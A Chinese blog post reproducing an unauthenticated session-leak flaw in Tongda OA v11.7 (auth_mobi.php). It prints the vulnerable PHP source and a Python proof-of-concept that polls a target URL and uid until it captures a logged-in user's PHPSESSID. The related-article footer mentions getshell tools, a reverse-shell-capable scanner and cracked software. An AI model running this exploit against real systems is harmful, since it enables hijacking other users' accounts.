通达OA v11.7 在线用户登录漏洞附自写poc

最新推荐文章于 2024-04-20 19:49:22 发布
最新推荐文章于 2024-04-20 19:49:22 发布
阅读量4.2k 收藏 9
点赞数 2
分类专栏: 漏洞复现
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/yiiiing/article/details/114397925
版权

文章目录

本文就介绍了通达OA v11.7 在线用户登录漏洞利用方法,及自己写的poc。

# 一、漏洞描述

通达OA v11.7 中webroot\mobile\auth_mobi.php接口存在漏洞,无验证即可查询某个用户是否在线并返回PHPSESSION值使其可登录后台系统。

二、漏洞影响

通达OA < v11.7

三、漏洞复现

通达oa的源码需要使用SeayDzend解密
定位到漏洞文件 \webroot\mobile\auth_mobi.php
代码比较少就直接贴出来:

<?php

function relogin()
{
	echo _("RELOGIN");
	exit();
}

ob_start();
include_once "inc/session.php";
include_once "inc/conn.php";
include_once "inc/utility.php";
if (($isAvatar == "1") && ($uid != "") && ($P_VER != "")) {
	$sql = "SELECT SID FROM user_online WHERE UID = '$uid' and CLIENT = '$P_VER'";
	$cursor = exequery(TD::conn(), $sql);

	if ($row = mysql_fetch_array($cursor)) {
		$P = $row["SID"];
	}
}

if ($P == "") {
	$P = $_COOKIE["PHPSESSID"];

	if ($P == "") {
		relogin();
		exit();
	}
}

if (preg_match("/[^a-z0-9;]+/i", $P)) {
	echo _("非法参数");
	exit();
}

if (strpos($P, ";") !== false) {
	$MY_ARRAY = explode(";", $P);
	$P = trim($MY_ARRAY[1]);
}

session_id($P);
session_start();
session_write_close();
if (($_SESSION["LOGIN_USER_ID"] == "") || ($_SESSION["LOGIN_UID"] == "")) {
	relogin();
}

?>

看13行代码这里,url后面跟上三个参数,

  1. isAvatar=1
  2. uid 不为空,需要查谁就填对应用户的uid
  3. P_VER 不为空 表示登录设备类型

17行代码这里会返回SID字段,也就是session id
22行这里判断返回的sid字段为空时,获取当前在线用户的PHPSESSID赋值(不在线返回空)给 P
如果 P 还是为空就调用relogin() 输出 RELOGIN

如果查询返回的sid字段不回空,并赋值给P
41行代码会将P设置为会话ID
这样我们就得到了header中Set-Cookie值
在这里插入图片描述
在线时:
在这里插入图片描述
不在线时:

在这里插入图片描述

四、漏洞利用POC

无限循环发起请求,获取到PHPSESSID自动停止

import requests
import sys
import re
import time

def poc(url,uid):
    url = f'{url}/mobile/auth_mobi.php?isAvatar=1&uid={uid}&P_VER=0'
    while True:
        res = requests.get(url)
        if res.status_code == 200:
            if res.text == '':
                cookies = re.findall(r'PHPSESSID=(.*?);', str(res.headers))
                print('[+]目标在线,PHPSESSID=' + cookies[0])
                break
            if 'RELOGIN' in res.text:
                print('[+]目标用户不在线')
        time.sleep(2)
def main(argv):
    print('------------------------------------------')
    print('[+]适用版本:通达OA 11.7 ')
    print('[+]使用格式: python3 poc.py url uid')
    print('------------------------------------------')
    poc(argv[0],argv[1])
        
if __name__ == '__main__':
    main(sys.argv[1:])

使用方法:python3 .\1.py ip uid
例如:python3 .\1.py http://192.168.230.130 12
在这里插入图片描述

五、总结

下载地址:通达oa 11.7下载链接

有什么不对的地方,请大佬们指出

yiiiing
关注
  • 2
    点赞
  • 9
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
专栏目录
通达OA 获取通达OA中的用户Session信息
小飞鱼通达 二开
10-22 4276
对应WEB程序来说获取Session信息是非常重要的功能,通过查询通达网站上得到了相应的方法。 1、常规方法:$_SESSION["LOGIN_USER_ID"] 2、需要包含:include_once("inc/auth.php");,然后直接用$LOGIN_USER_ID即可。
TongDa_Scan:通达OA在线用户登录poc
03-13
进攻简述 通达OA v11.7中存在某接口查询在线用户,当用户在线时会返回PHPSESSION实现可登录后台系统 影响版本 通达OA <v11.7 进攻利用 检测当前用户是否存在线 http://127.0.0.1/mobile/auth_mobi.php?isAvatar=1&uid=1&P_VER=0 不在线在线显示RELOGIN 在线 在线页面空白,但已拿到SESSION 设置Cookie可直接登录后台 http://127.0.0.1/general/index.php 工具利用 # 指定 URL python3 .\TongDa_Scan.py -u 127.0.0.1 # 指定 uid 进行扫描 python3 .\TongDa_Scan.py -u 127.0.0.1 -i 1 # 批量扫描,默认扫描UID为1 python3 .\TongDa_Scan.py -f .
最新通达OA漏洞利用工具_通达oa漏洞检测工具,已整理成文档
最新发布
2301_82243078的博客
04-20 885
在结束之际,我想重申的是,学习并非如攀登险峻高峰,而是如滴水穿石般的持久累积。尤其当我们步入工作岗位之后,持之以恒的学习变得愈发不易,如同在茫茫大海中独自划舟,稍有松懈便可能被巨浪吞噬。然而,对于我们程序员而言,学习是生存之本,是我们在激烈市场竞争中立于不败之地的关键。一旦停止学习,我们便如同逆水行舟,不进则退,终将被时代的洪流所淘汰。因此,不断汲取新知识,不仅是对自己的提升,更是对自己的一份珍贵投资。让我们不断磨砺自己,与时代共同进步,书写属于我们的辉煌篇章。需要完整版PDF学习资源私我。
带你打穿三层内网-红日靶场七
记录学习,一起进步
09-13 449
带你打穿三层内网-红日靶场七
通达OA前台伪造管理登陆cookie生成tongda.py
05-07
通达OA 前台伪造管理员登陆漏洞的cookie生成脚本,可以用以生成PHPsessionid,然后替换cookie,从而登陆通达OA后台。
通达OA前台任意用户登录漏洞.md
09-07
通达OA漏洞合集
ATT&CK实战:红日靶场七
学生
06-19 677
*] WebTitle: http://192.168.52.30:8080 code:200 len:10065 title:通达OA网络智能办公系统。[*] WebTitle: http://192.168.93.20:8080 code:200 len:10065 title:通达OA网络智能办公系统。[+] InfoScan:http://192.168.52.30:8080 [通达OA][+] InfoScan:http://192.168.93.20:8080 [通达OA]
通达OA v11.6 insert SQL注入漏洞.md
09-07
通达OA漏洞合集
通达OA v11.8 getway.php 远程文件包含漏洞.md
09-07
通达OA漏洞合集
通达OA v2017 video_file.php 任意文件下载漏洞.md
09-07
通达OA漏洞合集
[0day]通达 OA v11.7 后台 SQL 注入到 RCE1
08-03
通达 OA v11.7 版本存在后台 SQL 注入漏洞,攻击者可以通过构造特殊的 SQL 语句,绕过安全机制,获取数据库权限,并最终获得远程代码执行(RCE)权限。 知识点一:SQL 注入漏洞 SQL 注入漏洞是指攻击者通过构造...
fscan内网渗透神器
09-21
scan是一款内网综合扫描工具,它非常的方便,一键启动,之后完全自动化、并且全方位漏洞扫描。它支持主机存活探测、端口扫描、常见服务的爆破、ms17010、redis批量写公钥、计划任务反弹shell、读取win网卡信息、web指纹识别、web漏洞扫描、netbios探测、域控识别等功能。 2.主要功能 (1)信息搜集: 存活探测(icmp) 端口扫描 (2)爆破功能: 各类服务爆破(ssh、smb、rdp等) 数据库密码爆破(mysql、mssql、redis、psql、oracle等) (3)系统信息、漏洞扫描: netbios探测、域控识别 获取目标网卡信息 高危漏洞扫描(ms17010等) (4)Web探测功能: webtitle探测 web指纹识别(常见cms、oa框架等) web漏洞扫描(weblogic、st2等,支持xray的poc) (5)漏洞利用: redis写公钥或写计划任务 ssh命令执行
通达OA_2015_V8.5.150529完美破解版【含V8.5安装包】
10-14
此版本为本人购买版本,测试完美无错,含微信接口等,破解补丁为:Office Anywhere 2015版 集团版,此补丁不支持现在官方最新版本,本人测试V8.5.150529可完美破解,各功能正常,调整时间无限制。 资源中包含官方V8.5.150529安装包,只给补丁给你们怕你们也找不到这个版本的安装包,呵呵~ 【注:请严格安装补丁说明安装】
通达OA v11.7 在线用户登录漏洞复现(附带一键getshell脚本)
qq_44005305的博客
02-11 1077
在文章的顶部先说明,本文章所介绍的内容以及所附带的脚本仅供学习,如果存在有牟利行为,个人负责!!!仅用于学习娱乐,切勿用于非法用途!请于下载后24小时内删除,使用者承担所有法律责任!一个类似于越权的漏洞,但是利用的方式确实比较特殊。
通达OA v11.7 auth_mobi.php 在线用户登录漏洞复现
花开烟雨楼的博客
03-22 2457
通达OA,Office Anywhere的首字母,是通达信科旗下的品牌。通达OA v11.7 中存在某接口查询在线用户,当用户在线时会返回 PHPSESSION使其可登录后台系统通达OA,Office Anywhere的首字母,是通达信科旗下的品牌。通达OA v11.7 中存在某接口查询在线用户,当用户在线时会返回 PHPSESSION使其可登录后台系统。
通达OA_header_inc任意用户登录
Bnessy
10-29 235
【代码】通达OA_header_inc任意用户登录
漏洞复现-通达OA通达OA前台任意用户登录漏洞
xiaokp7的博客
06-18 2328
通达OA(Office Anywhere网络智能办公系统)是中国通达公司的一套协同办公自动化软件。通达OA < 11.5.200417存在一个认证绕过漏洞,利用该漏洞可以实现任意用户登录。攻击者可以通过构造恶意攻击代码,成功登录系统管理员账户,继而在系统后台上传恶意文件控制网站服务器。
通达OA系统11.2漏洞
qq_50854662的博客
12-02 4761
通达OA系统11.2版本为案例的Web渗透
通达OA前台任意用户登录漏洞复现
ergou11的博客
04-23 582
通达OA前台任意用户登录漏洞复现
通达oa任意用户登录
09-05
通达OA是一款常见的办公自动化软件,它提供了多种功能以方便用户进行办公工作。对于通达OA的任意用户登录,我可以提供以下回答。 通达OA允许任意用户登录,这意味着所有拥有有效账号和密码的用户都可以登录系统并访问其功能。用户可以通过在登录界面输入正确的用户名和密码,然后点击登录按钮来完成登录操作。系统将对用户的输入进行验证,如果验证通过,用户将成功登录系统。 通达OA用户登录是安全可靠的。系统会对用户的密码进行加密处理,确保用户的密码不会被泄露。此外,通达OA还提供了多种登录策略,例如登录失败锁定、设置密码复杂度要求和定期更新密码等,以增加系统的安全性。用户可以根据需要选择适合自己的登录策略。 一旦用户成功登录通达OA,他们就可以根据自己的权限进行各种操作。通达OA提供了丰富的功能模块,包括请假申请、加班申请、文档管理、日程安排、内部邮件等,用户可以根据需要选择并使用这些功能模块来提高工作效率。 总之,通达OA允许任意用户登录,用户只需提供正确的账号和密码即可登录系统,并根据自己的权限使用各种功能模块。它是一款安全可靠的办公自动化软件,有助于提高办公效率和工作质量。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值